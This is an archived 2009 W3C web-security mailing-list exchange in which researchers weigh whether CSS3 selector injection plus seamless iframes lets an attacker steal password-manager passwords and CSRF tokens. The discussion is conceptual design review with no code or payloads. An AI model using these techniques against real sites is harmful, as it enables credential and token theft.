Re: Seamless iframes + CSS3 selectors = bad idea from sird@rckc.at on 2009-12-05 (public-web-security@w3.org from December 2009)

From: <sird@rckc.at>
Date: Sun, 6 Dec 2009 02:16:05 +0800
To: Collin Jackson <w3c@collinjackson.com>
Cc: sird@rckc.at, Adam Barth <w3c@adambarth.com>, public-web-security@w3.org
Message-ID: <8ba534860912051016k8a1cb13te093103f93bcd74f@mail.gmail.com>

collin. this attack allows you to steal nonces, making csrf protections less
efficient. seamless iframes make this work on ALL the domain/origin..

greetings.

On Dec 6, 2009 2:05 AM, "Collin Jackson" <w3c@collinjackson.com> wrote:

A few thoughts:

* The password stealing attack can already be accomplished using the
iframe to create a login page and prompting the user to type their
password. It's not necessary to use CSS3 or seamless.
* If the password manager is used, CSS3 + seamless lets you steal the
password without user interaction.
* However, if you can inject arbitrary CSS3 and a seamless iframe into
a page, there's a good chance you can inject a password field, so this
password manager attack doesn't require seamless, just CSS3.
* Many webapps include a CSRF token in every page as a hidden form
field. If the page that allows CSS3 injection includes such a token,
you don't need seamless iframes to steal the token.

It seems like CSS3 is adding a lot of attack surface, sites may need
to block arbitrary CSS3 injection regardless of seamless. That is
unfortunate since browser vendors have been removing expression,
-moz-binding, and other features that make CSS injection dangerous.

On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote: > I
see.  The issue is that t...

Received on Saturday, 5 December 2009 18:20:06 UTC